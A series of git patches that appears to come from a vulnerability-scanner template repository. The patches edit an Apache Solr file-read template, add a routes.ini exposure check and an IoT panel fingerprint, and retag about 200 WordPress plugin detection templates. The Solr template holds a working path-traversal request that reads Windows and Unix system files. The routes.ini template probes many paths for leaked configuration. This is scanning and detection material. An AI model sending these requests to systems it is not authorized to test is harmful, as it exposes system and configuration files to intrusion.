a37abb440183e432ad578cf22a72d969d9e6cacf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 2 Dec 2022 09:12:05 +0530 Subject: [PATCH 0045/1133] Update apache-solr-file-read.yaml --- vulnerabilities/apache/apache-solr-file-read.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index 6ccddb4c27..8b437ea797 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -22,7 +22,7 @@ requests: Host: {{Hostname}} Accept-Language: en Connection: close - + - | GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../¶m=ContentStream HTTP/1.1 Host: {{Hostname}} @@ -51,13 +51,13 @@ requests: - "Users" - "org.apache.solr.handler.DumpRequestHandler" condition: and + - type: regex name: "Linux" regex: - "root:.*:0:0:" + - type: word name: "Other" words: - "java.io.FileNotFoundException" - -# Enhanced by mp on 2022/07/22 From 0384b0d51d88a51a0000a20df31808045c328b92 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 2 Dec 2022 09:13:23 +0530 Subject: [PATCH 0046/1133] Update apache-solr-file-read.yaml --- vulnerabilities/apache/apache-solr-file-read.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index 8b437ea797..333c4ec29e 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -2,7 +2,7 @@ id: apache-solr-file-read info: name: Apache Solr <= 8.8.1 - Local File Inclusion - author: DhiyaneshDk, philippedelteil + author: DhiyaneshDk,philippedelteil severity: high description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion. reference: From c8b5033ccc2ac5819c4f38f2ea93d23a7c82a2d3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 2 Dec 2022 09:21:51 +0530 Subject: [PATCH 0047/1133] Update apache-solr-file-read.yaml --- vulnerabilities/apache/apache-solr-file-read.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index 333c4ec29e..a6022ab36b 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -45,7 +45,7 @@ requests: matchers: - type: word - name: "Windows" + name: "windows" words: - "Windows" - "Users" @@ -53,11 +53,11 @@ requests: condition: and - type: regex - name: "Linux" + name: "linux" regex: - "root:.*:0:0:" - type: word - name: "Other" + name: "other" words: - "java.io.FileNotFoundException" From fd270d85f66c45af7cb8bc6168075ca2439ba50f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 2 Dec 2022 09:31:15 +0530 Subject: [PATCH 0048/1133] Update apache-solr-file-read.yaml --- .../apache/apache-solr-file-read.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index a6022ab36b..f24791365d 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -24,7 +24,7 @@ requests: Connection: close - | - GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../¶m=ContentStream HTTP/1.1 + GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../Windows/win.ini¶m=ContentStream HTTP/1.1 Host: {{Hostname}} Accept-Language: en Connection: close @@ -43,13 +43,15 @@ requests: regex: - '"name"\:"(.*?)"' + stop-at-first-match: true matchers: - type: word name: "windows" + part: body words: - - "Windows" - - "Users" - - "org.apache.solr.handler.DumpRequestHandler" + - "bit app support" + - "fonts" + - "extensions" condition: and - type: regex @@ -57,7 +59,6 @@ requests: regex: - "root:.*:0:0:" - - type: word - name: "other" - words: - - "java.io.FileNotFoundException" + - type: status + status: + - 200 From 11b94a1f5af0f0fac6b5266e62b0f894eeecd4f3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 2 Dec 2022 09:32:17 +0530 Subject: [PATCH 0049/1133] Update apache-solr-file-read.yaml --- vulnerabilities/apache/apache-solr-file-read.yaml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index f24791365d..ef6252d216 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -58,7 +58,3 @@ requests: name: "linux" regex: - "root:.*:0:0:" - - - type: status - status: - - 200 From c4e1db2b770d7a51351a9535f9b8eeebb16d4888 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 2 Dec 2022 10:30:45 +0530 Subject: [PATCH 0050/1133] Create routes-ini.yaml --- exposures/files/routes-ini.yaml | 47 +++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 exposures/files/routes-ini.yaml diff --git a/exposures/files/routes-ini.yaml b/exposures/files/routes-ini.yaml new file mode 100644 index 0000000000..b413ea190a --- /dev/null +++ b/exposures/files/routes-ini.yaml @@ -0,0 +1,47 @@ +id: routes-ini + +info: + name: routes.ini File Exposure + author: geeknik + severity: info + metadata: + verified: true + github-query: filename:routes.ini + google-query: intitle:"index of" "routes.ini" + tags: routes,config,exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}/routes.ini" + - "{{BaseURL}}/config/routes.ini" + - "{{BaseURL}}/admin/configs/routes.ini" + - "{{BaseURL}}/application/configs/routes.ini" + - "{{BaseURL}}/aplicacao/routes/configs/routes.ini" + - "{{BaseURL}}/routes/configs/routes.ini" + - "{{BaseURL}}/cloudexp/routes/configs/routes.ini" + - "{{BaseURL}}/cms/routes/configs/routes.ini" + - "{{BaseURL}}/moto/routes/configs/routes.ini" + - "{{BaseURL}}/Partners/routes/configs/routes.ini" + - "{{BaseURL}}/radio/routes/configs/routes.ini" + - "{{BaseURL}}/seminovos/routes/configs/routes.ini" + - "{{BaseURL}}/shop/routes/configs/routes.ini" + - "{{BaseURL}}/site_cg/routes/configs/routes.ini" + - "{{BaseURL}}/slr/routes/configs/routes.ini" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "defaults.action" + - "routes.admin" + condition: and + + - type: word + part: body + words: + - "[routes]" + - "GET /" + condition: and From 21965bc226788619473e98ddfd78fb742195e693 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 2 Dec 2022 10:43:44 +0530 Subject: [PATCH 0051/1133] Create homeworks-illumination.yaml --- iot/homeworks-illumination.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 iot/homeworks-illumination.yaml diff --git a/iot/homeworks-illumination.yaml b/iot/homeworks-illumination.yaml new file mode 100644 index 0000000000..7712bba606 --- /dev/null +++ b/iot/homeworks-illumination.yaml @@ -0,0 +1,30 @@ +id: homeworks-illumination + +info: + name: HomeWorks Illumination Web Keypad + author: geeknik + severity: low + reference: + - https://www.lutron.com + metadata: + verified: true + shodan-query: html:"HomeWorks Illumination Web Keypad" + tags: misconfig,iot,homeworks + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "HomeWorks Illumination Web Keypad" + - "lutron.js" + - "Lutron HomeWorks" + condition: and + + - type: status + status: + - 200 From 232540b1db3630a010c04ab6403a6a186b92c699 Mon Sep 17 00:00:00 2001 From: Ricardo Maia <rsmaia@gmail.com> Date: Fri, 2 Dec 2022 03:10:31 -0300 Subject: [PATCH 0052/1133] Add top 200 tag to top 100 --- technologies/wordpress/wordpress-ad-inserter.yaml | 2 +- technologies/wordpress/wordpress-add-to-any.yaml | 2 +- technologies/wordpress/wordpress-admin-menu-editor.yaml | 2 +- technologies/wordpress/wordpress-adminimize.yaml | 2 +- technologies/wordpress/wordpress-advanced-custom-fields.yaml | 4 ++-- technologies/wordpress/wordpress-akismet.yaml | 4 ++-- .../wordpress/wordpress-all-404-redirect-to-homepage.yaml | 2 +- technologies/wordpress/wordpress-all-in-one-seo-pack.yaml | 4 ++-- technologies/wordpress/wordpress-all-in-one-wp-migration.yaml | 4 ++-- .../wordpress-all-in-one-wp-security-and-firewall.yaml | 4 ++-- technologies/wordpress/wordpress-amp.yaml | 2 +- technologies/wordpress/wordpress-antispam-bee.yaml | 4 ++-- technologies/wordpress/wordpress-astra-sites.yaml | 4 ++-- technologies/wordpress/wordpress-astra-widgets.yaml | 2 +- technologies/wordpress/wordpress-autoptimize.yaml | 4 ++-- technologies/wordpress/wordpress-backwpup.yaml | 4 ++-- technologies/wordpress/wordpress-better-search-replace.yaml | 4 ++-- technologies/wordpress/wordpress-better-wp-security.yaml | 4 ++-- .../wordpress/wordpress-black-studio-tinymce-widget.yaml | 2 +- technologies/wordpress/wordpress-breadcrumb-navxt.yaml | 4 ++-- technologies/wordpress/wordpress-broken-link-checker.yaml | 4 ++-- .../wordpress/wordpress-child-theme-configurator.yaml | 2 +- technologies/wordpress/wordpress-classic-editor.yaml | 4 ++-- technologies/wordpress/wordpress-classic-widgets.yaml | 4 ++-- .../wordpress/wordpress-click-to-chat-for-whatsapp.yaml | 2 +- technologies/wordpress/wordpress-cloudflare.yaml | 2 +- technologies/wordpress/wordpress-cmb2.yaml | 2 +- technologies/wordpress/wordpress-coblocks.yaml | 2 +- technologies/wordpress/wordpress-code-snippets.yaml | 4 ++-- technologies/wordpress/wordpress-coming-soon.yaml | 4 ++-- technologies/wordpress/wordpress-complianz-gdpr.yaml | 2 +- technologies/wordpress/wordpress-contact-form-7-honeypot.yaml | 2 +- technologies/wordpress/wordpress-contact-form-7.yaml | 4 ++-- technologies/wordpress/wordpress-contact-form-cfdb7.yaml | 2 +- technologies/wordpress/wordpress-cookie-law-info.yaml | 4 ++-- technologies/wordpress/wordpress-cookie-notice.yaml | 4 ++-- technologies/wordpress/wordpress-creame-whatsapp-me.yaml | 2 +- .../wordpress-creative-mail-by-constant-contact.yaml | 4 ++-- technologies/wordpress/wordpress-custom-css-js.yaml | 2 +- technologies/wordpress/wordpress-custom-fonts.yaml | 2 +- technologies/wordpress/wordpress-custom-post-type-ui.yaml | 4 ++-- technologies/wordpress/wordpress-disable-comments.yaml | 4 ++-- technologies/wordpress/wordpress-disable-gutenberg.yaml | 4 ++-- technologies/wordpress/wordpress-duplicate-page.yaml | 4 ++-- technologies/wordpress/wordpress-duplicate-post.yaml | 4 ++-- technologies/wordpress/wordpress-duplicator.yaml | 4 ++-- .../wordpress/wordpress-duracelltomi-google-tag-manager.yaml | 2 +- technologies/wordpress/wordpress-easy-fancybox.yaml | 2 +- technologies/wordpress/wordpress-easy-google-fonts.yaml | 2 +- technologies/wordpress/wordpress-easy-table-of-contents.yaml | 2 +- technologies/wordpress/wordpress-easy-wp-smtp.yaml | 4 ++-- technologies/wordpress/wordpress-elementor.yaml | 4 ++-- technologies/wordpress/wordpress-elementskit-lite.yaml | 4 ++-- technologies/wordpress/wordpress-enable-media-replace.yaml | 2 +- technologies/wordpress/wordpress-envato-elements.yaml | 4 ++-- .../wordpress-essential-addons-for-elementor-lite.yaml | 4 ++-- technologies/wordpress/wordpress-ewww-image-optimizer.yaml | 4 ++-- .../wordpress/wordpress-facebook-for-woocommerce.yaml | 4 ++-- .../wordpress/wordpress-favicon-by-realfavicongenerator.yaml | 2 +- technologies/wordpress/wordpress-flamingo.yaml | 4 ++-- technologies/wordpress/wordpress-fluentform.yaml | 2 +- technologies/wordpress/wordpress-font-awesome.yaml | 2 +- .../wordpress/wordpress-force-regenerate-thumbnails.yaml | 2 +- technologies/wordpress/wordpress-formidable.yaml | 2 +- technologies/wordpress/wordpress-forminator.yaml | 2 +- technologies/wordpress/wordpress-ga-google-analytics.yaml | 4 ++-- .../wordpress-google-analytics-dashboard-for-wp.yaml | 4 ++-- .../wordpress/wordpress-google-analytics-for-wordpress.yaml | 4 ++-- technologies/wordpress/wordpress-google-listings-and-ads.yaml | 2 +- technologies/wordpress/wordpress-google-site-kit.yaml | 4 ++-- .../wordpress/wordpress-google-sitemap-generator.yaml | 4 ++-- technologies/wordpress/wordpress-gtranslate.yaml | 2 +- technologies/wordpress/wordpress-gutenberg.yaml | 2 +- technologies/wordpress/wordpress-happy-elementor-addons.yaml | 2 +- .../wordpress/wordpress-header-and-footer-scripts.yaml | 2 +- .../wordpress/wordpress-header-footer-code-manager.yaml | 2 +- technologies/wordpress/wordpress-header-footer-elementor.yaml | 4 ++-- technologies/wordpress/wordpress-header-footer.yaml | 2 +- technologies/wordpress/wordpress-health-check.yaml | 2 +- technologies/wordpress/wordpress-hello-dolly.yaml | 4 ++-- technologies/wordpress/wordpress-imagify.yaml | 4 ++-- technologies/wordpress/wordpress-imsanity.yaml | 2 +- .../wordpress/wordpress-insert-headers-and-footers.yaml | 4 ++-- technologies/wordpress/wordpress-instagram-feed.yaml | 4 ++-- .../wordpress/wordpress-intuitive-custom-post-order.yaml | 2 +- technologies/wordpress/wordpress-iwp-client.yaml | 2 +- technologies/wordpress/wordpress-jetpack.yaml | 4 ++-- technologies/wordpress/wordpress-kadence-blocks.yaml | 2 +- technologies/wordpress/wordpress-kirki.yaml | 2 +- technologies/wordpress/wordpress-leadin.yaml | 2 +- .../wordpress/wordpress-limit-login-attempts-reloaded.yaml | 4 ++-- technologies/wordpress/wordpress-limit-login-attempts.yaml | 4 ++-- technologies/wordpress/wordpress-litespeed-cache.yaml | 4 ++-- technologies/wordpress/wordpress-loco-translate.yaml | 4 ++-- technologies/wordpress/wordpress-loginizer.yaml | 4 ++-- technologies/wordpress/wordpress-loginpress.yaml | 2 +- .../wordpress/wordpress-mailchimp-for-woocommerce.yaml | 2 +- technologies/wordpress/wordpress-mailchimp-for-wp.yaml | 4 ++-- technologies/wordpress/wordpress-mailpoet.yaml | 2 +- technologies/wordpress/wordpress-maintenance.yaml | 4 ++-- technologies/wordpress/wordpress-mainwp-child.yaml | 2 +- technologies/wordpress/wordpress-malcare-security.yaml | 2 +- technologies/wordpress/wordpress-megamenu.yaml | 2 +- technologies/wordpress/wordpress-members.yaml | 2 +- technologies/wordpress/wordpress-meta-box.yaml | 4 ++-- technologies/wordpress/wordpress-ml-slider.yaml | 4 ++-- technologies/wordpress/wordpress-newsletter.yaml | 2 +- .../wordpress/wordpress-nextend-facebook-connect.yaml | 2 +- technologies/wordpress/wordpress-nextgen-gallery.yaml | 2 +- technologies/wordpress/wordpress-ninja-forms.yaml | 4 ++-- technologies/wordpress/wordpress-ocean-extra.yaml | 4 ++-- technologies/wordpress/wordpress-official-facebook-pixel.yaml | 2 +- technologies/wordpress/wordpress-one-click-demo-import.yaml | 4 ++-- technologies/wordpress/wordpress-optinmonster.yaml | 4 ++-- technologies/wordpress/wordpress-password-protected.yaml | 2 +- technologies/wordpress/wordpress-pdf-embedder.yaml | 2 +- technologies/wordpress/wordpress-photo-gallery.yaml | 2 +- .../wordpress/wordpress-php-compatibility-checker.yaml | 2 +- technologies/wordpress/wordpress-pixelyoursite.yaml | 2 +- technologies/wordpress/wordpress-polylang.yaml | 4 ++-- technologies/wordpress/wordpress-popup-builder.yaml | 2 +- technologies/wordpress/wordpress-popup-maker.yaml | 4 ++-- technologies/wordpress/wordpress-post-duplicator.yaml | 2 +- technologies/wordpress/wordpress-post-smtp.yaml | 2 +- technologies/wordpress/wordpress-post-types-order.yaml | 2 +- .../wordpress/wordpress-premium-addons-for-elementor.yaml | 2 +- technologies/wordpress/wordpress-pretty-link.yaml | 2 +- technologies/wordpress/wordpress-really-simple-captcha.yaml | 2 +- technologies/wordpress/wordpress-really-simple-ssl.yaml | 4 ++-- technologies/wordpress/wordpress-redirection.yaml | 4 ++-- technologies/wordpress/wordpress-redux-framework.yaml | 4 ++-- technologies/wordpress/wordpress-regenerate-thumbnails.yaml | 4 ++-- technologies/wordpress/wordpress-safe-svg.yaml | 4 ++-- technologies/wordpress/wordpress-seo-by-rank-math.yaml | 4 ++-- technologies/wordpress/wordpress-sg-cachepress.yaml | 4 ++-- technologies/wordpress/wordpress-sg-security.yaml | 4 ++-- technologies/wordpress/wordpress-shortcodes-ultimate.yaml | 4 ++-- .../wordpress/wordpress-shortpixel-image-optimiser.yaml | 2 +- .../wordpress/wordpress-simple-custom-post-order.yaml | 2 +- technologies/wordpress/wordpress-simple-page-ordering.yaml | 2 +- technologies/wordpress/wordpress-siteguard.yaml | 2 +- technologies/wordpress/wordpress-siteorigin-panels.yaml | 4 ++-- technologies/wordpress/wordpress-smart-slider-3.yaml | 4 ++-- technologies/wordpress/wordpress-so-widgets-bundle.yaml | 4 ++-- .../wordpress/wordpress-ssl-insecure-content-fixer.yaml | 2 +- .../wordpress-stops-core-theme-and-plugin-updates.yaml | 2 +- technologies/wordpress/wordpress-sucuri-scanner.yaml | 4 ++-- technologies/wordpress/wordpress-svg-support.yaml | 4 ++-- technologies/wordpress/wordpress-table-of-contents-plus.yaml | 2 +- technologies/wordpress/wordpress-tablepress.yaml | 4 ++-- technologies/wordpress/wordpress-taxonomy-terms-order.yaml | 2 +- technologies/wordpress/wordpress-the-events-calendar.yaml | 4 ++-- technologies/wordpress/wordpress-themeisle-companion.yaml | 2 +- technologies/wordpress/wordpress-tinymce-advanced.yaml | 4 ++-- .../wordpress/wordpress-translatepress-multilingual.yaml | 2 +- .../wordpress/wordpress-ultimate-addons-for-gutenberg.yaml | 2 +- technologies/wordpress/wordpress-under-construction-page.yaml | 2 +- technologies/wordpress/wordpress-unyson.yaml | 2 +- technologies/wordpress/wordpress-updraftplus.yaml | 4 ++-- technologies/wordpress/wordpress-use-any-font.yaml | 2 +- technologies/wordpress/wordpress-user-role-editor.yaml | 4 ++-- .../wordpress/wordpress-velvet-blues-update-urls.yaml | 2 +- technologies/wordpress/wordpress-w3-total-cache.yaml | 4 ++-- .../wordpress/wordpress-widget-importer-exporter.yaml | 2 +- .../wordpress/wordpress-woo-cart-abandonment-recovery.yaml | 2 +- .../wordpress/wordpress-woo-checkout-field-editor-pro.yaml | 2 +- technologies/wordpress/wordpress-woo-variation-swatches.yaml | 2 +- ...wordpress-woocommerce-gateway-paypal-express-checkout.yaml | 2 +- .../wordpress/wordpress-woocommerce-gateway-stripe.yaml | 4 ++-- technologies/wordpress/wordpress-woocommerce-payments.yaml | 2 +- .../wordpress/wordpress-woocommerce-paypal-payments.yaml | 2 +- .../wordpress-woocommerce-pdf-invoices-packing-slips.yaml | 2 +- technologies/wordpress/wordpress-woocommerce-services.yaml | 4 ++-- technologies/wordpress/wordpress-woocommerce.yaml | 4 ++-- technologies/wordpress/wordpress-woosidebars.yaml | 2 +- technologies/wordpress/wordpress-wordfence.yaml | 4 ++-- technologies/wordpress/wordpress-wordpress-importer.yaml | 4 ++-- technologies/wordpress/wordpress-wordpress-seo.yaml | 4 ++-- technologies/wordpress/wordpress-worker.yaml | 4 ++-- technologies/wordpress/wordpress-wp-fastest-cache.yaml | 4 ++-- technologies/wordpress/wordpress-wp-file-manager.yaml | 4 ++-- technologies/wordpress/wordpress-wp-google-maps.yaml | 2 +- technologies/wordpress/wordpress-wp-mail-smtp.yaml | 4 ++-- technologies/wordpress/wordpress-wp-maintenance-mode.yaml | 4 ++-- technologies/wordpress/wordpress-wp-migrate-db.yaml | 2 +- technologies/wordpress/wordpress-wp-multibyte-patch.yaml | 4 ++-- technologies/wordpress/wordpress-wp-optimize.yaml | 4 ++-- technologies/wordpress/wordpress-wp-pagenavi.yaml | 4 ++-- technologies/wordpress/wordpress-wp-reset.yaml | 2 +- technologies/wordpress/wordpress-wp-sitemap-page.yaml | 2 +- technologies/wordpress/wordpress-wp-smushit.yaml | 4 ++-- technologies/wordpress/wordpress-wp-statistics.yaml | 2 +- technologies/wordpress/wordpress-wp-super-cache.yaml | 4 ++-- technologies/wordpress/wordpress-wp-user-avatar.yaml | 2 +- technologies/wordpress/wordpress-wpcf7-recaptcha.yaml | 2 +- technologies/wordpress/wordpress-wpcf7-redirect.yaml | 2 +- technologies/wordpress/wordpress-wpforms-lite.yaml | 4 ++-- technologies/wordpress/wordpress-wps-hide-login.yaml | 4 ++-- .../wordpress/wordpress-yith-woocommerce-compare.yaml | 2 +- .../wordpress/wordpress-yith-woocommerce-wishlist.yaml | 4 ++-- 200 files changed, 300 insertions(+), 300 deletions(-) diff --git a/technologies/wordpress/wordpress-ad-inserter.yaml b/technologies/wordpress/wordpress-ad-inserter.yaml index 51fad43619..dac4bde57a 100644 --- a/technologies/wordpress/wordpress-ad-inserter.yaml +++ b/technologies/wordpress/wordpress-ad-inserter.yaml @@ -1,7 +1,7 @@ id: wordpress-ad-inserter info: - name: Ad Inserter – Ad Manager & AdSense Ads Detection + name: "Ad Inserter – Ad Manager & AdSense Ads Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-add-to-any.yaml b/technologies/wordpress/wordpress-add-to-any.yaml index d8616be442..3d176504e2 100644 --- a/technologies/wordpress/wordpress-add-to-any.yaml +++ b/technologies/wordpress/wordpress-add-to-any.yaml @@ -1,7 +1,7 @@ id: wordpress-add-to-any info: - name: AddToAny Share Buttons Detection + name: "AddToAny Share Buttons Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-admin-menu-editor.yaml b/technologies/wordpress/wordpress-admin-menu-editor.yaml index e3559a3a3f..0fa802315f 100644 --- a/technologies/wordpress/wordpress-admin-menu-editor.yaml +++ b/technologies/wordpress/wordpress-admin-menu-editor.yaml @@ -1,7 +1,7 @@ id: wordpress-admin-menu-editor info: - name: Admin Menu Editor Detection + name: "Admin Menu Editor Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-adminimize.yaml b/technologies/wordpress/wordpress-adminimize.yaml index 7baed3fe7e..cfd20a8b88 100644 --- a/technologies/wordpress/wordpress-adminimize.yaml +++ b/technologies/wordpress/wordpress-adminimize.yaml @@ -1,7 +1,7 @@ id: wordpress-adminimize info: - name: Adminimize Detection + name: "Adminimize Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-advanced-custom-fields.yaml b/technologies/wordpress/wordpress-advanced-custom-fields.yaml index d65c4f7b7c..b47cd4f8c4 100644 --- a/technologies/wordpress/wordpress-advanced-custom-fields.yaml +++ b/technologies/wordpress/wordpress-advanced-custom-fields.yaml @@ -1,7 +1,7 @@ id: wordpress-advanced-custom-fields info: - name: Advanced Custom Fields Detection + name: "Advanced Custom Fields Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-akismet.yaml b/technologies/wordpress/wordpress-akismet.yaml index c8b2f2b1d0..e199d46034 100644 --- a/technologies/wordpress/wordpress-akismet.yaml +++ b/technologies/wordpress/wordpress-akismet.yaml @@ -1,7 +1,7 @@ id: wordpress-akismet info: - name: Akismet Spam Protection Detection + name: "Akismet Spam Protection Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml b/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml index 4e71b5ad00..890d66c218 100644 --- a/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml +++ b/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml @@ -1,7 +1,7 @@ id: wordpress-all-404-redirect-to-homepage info: - name: All 404 Redirect to Homepage & Broken images Redirection Detection + name: "All 404 Redirect to Homepage & Broken images Redirection Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml b/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml index 52c55e3915..dd9a920b47 100644 --- a/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml +++ b/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml @@ -1,7 +1,7 @@ id: wordpress-all-in-one-seo-pack info: - name: All in One SEO – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic Detection + name: "All in One SEO – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml b/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml index 522a72e3bf..4ced1376aa 100644 --- a/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml +++ b/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml @@ -1,7 +1,7 @@ id: wordpress-all-in-one-wp-migration info: - name: All-in-One WP Migration Detection + name: "All-in-One WP Migration Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml b/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml index e9b260e00e..21c69ea3ec 100644 --- a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml +++ b/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml @@ -1,7 +1,7 @@ id: wordpress-all-in-one-wp-security-and-firewall info: - name: All-In-One Security (AIOS) – Security and Firewall Detection + name: "All-In-One Security (AIOS) – Security and Firewall Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-amp.yaml b/technologies/wordpress/wordpress-amp.yaml index f818739085..a24d8cb1bd 100644 --- a/technologies/wordpress/wordpress-amp.yaml +++ b/technologies/wordpress/wordpress-amp.yaml @@ -1,7 +1,7 @@ id: wordpress-amp info: - name: AMP Detection + name: "AMP Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-antispam-bee.yaml b/technologies/wordpress/wordpress-antispam-bee.yaml index 6ce8f43a61..d3843b4eb2 100644 --- a/technologies/wordpress/wordpress-antispam-bee.yaml +++ b/technologies/wordpress/wordpress-antispam-bee.yaml @@ -1,7 +1,7 @@ id: wordpress-antispam-bee info: - name: Antispam Bee Detection + name: "Antispam Bee Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-astra-sites.yaml b/technologies/wordpress/wordpress-astra-sites.yaml index 2573bc5c90..e315fde1c1 100644 --- a/technologies/wordpress/wordpress-astra-sites.yaml +++ b/technologies/wordpress/wordpress-astra-sites.yaml @@ -1,7 +1,7 @@ id: wordpress-astra-sites info: - name: Starter Templates — Elementor, WordPress & Beaver Builder Templates Detection + name: "Starter Templates — Elementor, WordPress & Beaver Builder Templates Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-astra-widgets.yaml b/technologies/wordpress/wordpress-astra-widgets.yaml index d075689079..31b65bad53 100644 --- a/technologies/wordpress/wordpress-astra-widgets.yaml +++ b/technologies/wordpress/wordpress-astra-widgets.yaml @@ -1,7 +1,7 @@ id: wordpress-astra-widgets info: - name: Astra Widgets Detection + name: "Astra Widgets Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-autoptimize.yaml b/technologies/wordpress/wordpress-autoptimize.yaml index cc7c99eccd..7357000193 100644 --- a/technologies/wordpress/wordpress-autoptimize.yaml +++ b/technologies/wordpress/wordpress-autoptimize.yaml @@ -1,7 +1,7 @@ id: wordpress-autoptimize info: - name: Autoptimize Detection + name: "Autoptimize Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-backwpup.yaml b/technologies/wordpress/wordpress-backwpup.yaml index ee28fb0db0..55a2cf2c2f 100644 --- a/technologies/wordpress/wordpress-backwpup.yaml +++ 